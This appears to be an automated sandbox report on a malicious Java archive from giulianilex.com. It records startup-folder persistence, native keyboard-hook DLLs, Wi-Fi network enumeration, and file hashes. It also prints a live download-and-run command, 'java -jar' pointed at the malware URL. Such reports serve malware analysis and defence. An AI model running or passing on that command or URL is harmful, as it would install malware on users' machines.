hxxp://giulianilex[.]com/178[.]jar

Resubmissions

07/06/2023, 21:31

230607-1ddd8agb57 1

05/06/2023, 23:03

230605-21yt4sbb33 7

Analysis

max time kernel
360s
max time network
361s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
05/06/2023, 23:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://giulianilex.com/178.jar

Score

7^/10

Malware Config

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jre-8u333-windows-i586.jar	javaw.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jre-8u333-windows-i586.jar	javaw.exe

Loads dropped DLL 2 IoCs

pid	Process
820	javaw.exe
820	javaw.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133304799994551245"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2692	chrome.exe
2692	chrome.exe
2892	chrome.exe
2892	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe
Token: SeShutdownPrivilege	2692	chrome.exe
Token: SeCreatePagefilePrivilege	2692	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe
2692	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe
820	javaw.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 3932	2692	chrome.exe	100
PID 2692 wrote to memory of 3932	2692	chrome.exe	100
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 2112	2692	chrome.exe	101
PID 2692 wrote to memory of 4108	2692	chrome.exe	102
PID 2692 wrote to memory of 4108	2692	chrome.exe	102
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103
PID 2692 wrote to memory of 1736	2692	chrome.exe	103

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar http://giulianilex.com/178.jar
1⤵
PID:368

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xa4,0x120,0x124,0xfc,0x128,0x7ff865409758,0x7ff865409768,0x7ff865409778
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:2
  2⤵
  PID:2112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1432 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:1736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:1
  2⤵
  PID:3416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3340 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3892 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:1
  2⤵
  PID:3396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:4340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4808 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:3788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4848 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:1
  2⤵
  PID:3928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:4212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:3716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3560 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:8
  2⤵
  PID:3656
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\178.jar"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  PID:820
- - C:\Windows\SYSTEM32\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    PID:3420
- - C:\Windows\SYSTEM32\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2796 --field-trial-handle=1836,i,8120071575460260553,7497619136505322243,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2892

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4328

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\501c61ec-218d-4c6d-a371-334e18f58768.tmp

Filesize
1013B

MD5
4a3c5a9fd89c29f5f55797165470128a

SHA1
756f21ddd278df3d0cbfb453e057f26b96698d72

SHA256
443079fa266ca0544913c1bcc2d7376d0b6a93ed5e1671dc6968afbf3e075d2d

SHA512
28113281d04fc0de201e505c614698c495625eb13981039d6d87706caa55fe99d42cd22bdea07a713ae07bce66d3660e011edc21d0419ad4168a540840423336

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
dc2cb5816288f53a1fe1dee75b680fcf

SHA1
f7b67bdb00802165b320bdd95130fe87688489b5

SHA256
a8f7b3e5d52fad8dd91a0e9c66a79208d67b2a518cf7a754b5141e133e671e38

SHA512
32386f87f5bcd6da68b62fef6eac070a0017bbb80d306a06901d11610bd225409a5632bee8515cc28de478bd8651227d017a88c07e1a84651cdef94ea24d049a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
06db591adb3a93122335df62b96d0b57

SHA1
c8d141f09e4a000a5c01ade50b71cff5b1330526

SHA256
a51cf87a97e0b1cd21be485b6e12cad145488cb33308b140681795fec84c141d

SHA512
a5f1f7b1c7f293cbc83993f41c62e18af7ff515e4fefa8ca5af6841c78ab44b6586ce68ebdc1930faff1baab9443fddb29e472477581bb196a9f89883e3bdd9c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
09c72003d78f65eea72321714e11351f

SHA1
643b24f07e366d01d4efc5de817a03baa9e8487d

SHA256
1f1260cdb90c79cb6648cf4596742061ea5ea37d952502863973136ac89f0439

SHA512
36994bcef7e0e9451dfec948684eb019c7d3d6e076636eb369fc97cc286cb29ea82312cb0e64d4db930fca4ae42b944dba610caee8ddbf3846971491e349503c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
36900c299149d8b98057775c7b910dc8

SHA1
abedaeb5906b5b68b2f38fc85a2f6453333a0e18

SHA256
40f5ec54883deb30855430c779f370461e70ddc31712e24f5cf35c2db4bea6d1

SHA512
fe42651bf44c3e485e78524223dec72518a3eea6cdd2035680cee51137a53f0940900b7c80d482a55e1c4b743353ee5d700420f56d0e9cdc538238971c41b0fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
3f9d9f00f6623a8f38415d1d70ad8823

SHA1
a341aa008f0e928a6127deda0fe71530c82f275d

SHA256
b3eada0aa9290d501208b8e5e5dae74917b67b585b80fd824937415323cd279d

SHA512
63eba1375ed5e938af64e91fef1bb759fec0cc01bacafa915265f2ba1806fdd07391b41874a175d9a222e446ecb8009145bddcda9a0044d26db546f00a2b4b97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
156KB

MD5
3650befe240b3c841b8c41481c6377f5

SHA1
e8472d974f84884dea943a73afe2cd44a92cd587

SHA256
3b772c181358cb32ec6759e931a4031b8187b5054deb6c92b7b017a612d6eaef

SHA512
b763dfc3a3326b33053af255ef19740372d6433daeba6bc9aba22b7c781d8e008de0f040f04c71675ebc42ba71ce796393f924b951c59ba4dc8ef1d866fa4a45

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
51c4d63ba67a0b5c7c08731de184ad56

SHA1
9ee3d2eb8d856ce829422fc40c3156cb15c0c596

SHA256
e1b31168ebbad998e9af337dae9abf7a42aa872e423a82c6af09ae8f1df24ed2

SHA512
a09974ea1f18aa30f1a91692af9bdf8076c7d00e0e75e2cef8b5c6cc8cea657cd3a587449f781a4323f361ddd385082de0dd41d2988d634e091bca8af6d03d8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a23f4.TMP

Filesize
97KB

MD5
5446358e6802ab643569bc99c8fb7036

SHA1
c474d5eb20b8eace32c95906d9d0659f549890e7

SHA256
afd19164ef72cb7eecae31784ab7543f71f776e61e68f65e10e76aa72fb28dd6

SHA512
7dedf7d3673c3c35b2fc8820f02919e048ffe8dfc36a60bba83e35668af3dc68b58df9c2fc212f7fb9eba7f65cc9b5f4dee487727f7605f6c78eca63d484941c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\JNativeHook-385777659FA84E94A3812EB9A8AFAD27AE3CEED4.x86_64.dll

Filesize
80KB

MD5
e9a449971b9efb0a2e12b9cfdd95c076

SHA1
385777659fa84e94a3812eb9a8afad27ae3ceed4

SHA256
b8c331c9f915960201da9af9c9dc8309e95e7d533741e71f4a5d13ca007d3e18

SHA512
bbcaf66b316cb60c63bb190099bee36a0059f13fa35fdf3a9a3e7e9a5304abe57acd71d644cde554427825249b460d58f0aba79f599f0c6fa40d23ea21aa941d

Download Submit
C:\Users\Admin\AppData\Local\Temp\JNativeHook-385777659FA84E94A3812EB9A8AFAD27AE3CEED4.x86_64.dll

Filesize
80KB

MD5
e9a449971b9efb0a2e12b9cfdd95c076

SHA1
385777659fa84e94a3812eb9a8afad27ae3ceed4

SHA256
b8c331c9f915960201da9af9c9dc8309e95e7d533741e71f4a5d13ca007d3e18

SHA512
bbcaf66b316cb60c63bb190099bee36a0059f13fa35fdf3a9a3e7e9a5304abe57acd71d644cde554427825249b460d58f0aba79f599f0c6fa40d23ea21aa941d

Download Submit
C:\Users\Admin\AppData\Local\Temp\jna-63116079\jna6295599771779100141.dll

Filesize
248KB

MD5
4de85f9679c3a75f6d7d3e56094aa106

SHA1
052f62fb2ebec89fbe412db480865910eab693ad

SHA256
3d1b2427b45ff5178bbb4db395758bedd3a1e91121ebb3e3640b5c4e20eb22cc

SHA512
e8357eabd548ffeba42715d891b9e1ed22b7bf720f48b1888407b9ebe7a796719c60a38f4fb8bb1cf32d3c9bed210a07cc227424ef991d356ec3acef9e6223ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\jna-63116079\jna6295599771779100141.dll

Filesize
248KB

MD5
4de85f9679c3a75f6d7d3e56094aa106

SHA1
052f62fb2ebec89fbe412db480865910eab693ad

SHA256
3d1b2427b45ff5178bbb4db395758bedd3a1e91121ebb3e3640b5c4e20eb22cc

SHA512
e8357eabd548ffeba42715d891b9e1ed22b7bf720f48b1888407b9ebe7a796719c60a38f4fb8bb1cf32d3c9bed210a07cc227424ef991d356ec3acef9e6223ab

Download Submit
C:\Users\Admin\Downloads\178.jar

Filesize
13.9MB

MD5
a7eeab7e2e90d0373ebfb15243bff81a

SHA1
fc32670a240a9e42ba6c453a68dec0933a85355f

SHA256
41a037f09bf41b5cb1ca453289e6ca961d61cd96eeefb1b5bbf153612396d919

SHA512
bec9fe1bd4305326e307a9ebeb17d7e4ba3c4f0bc108e7d39c93a74faee174b762bb06a4ef7c4e04f4284c4e6c351aac249e74619d473a4539436e28a82a066f

Download Submit
C:\Users\Admin\Downloads\178.jar.crdownload

Filesize
13.9MB

MD5
a7eeab7e2e90d0373ebfb15243bff81a

SHA1
fc32670a240a9e42ba6c453a68dec0933a85355f

SHA256
41a037f09bf41b5cb1ca453289e6ca961d61cd96eeefb1b5bbf153612396d919

SHA512
bec9fe1bd4305326e307a9ebeb17d7e4ba3c4f0bc108e7d39c93a74faee174b762bb06a4ef7c4e04f4284c4e6c351aac249e74619d473a4539436e28a82a066f

Download Submit
memory/820-253-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/820-254-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/820-241-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/820-295-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/820-299-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/820-344-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/820-353-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download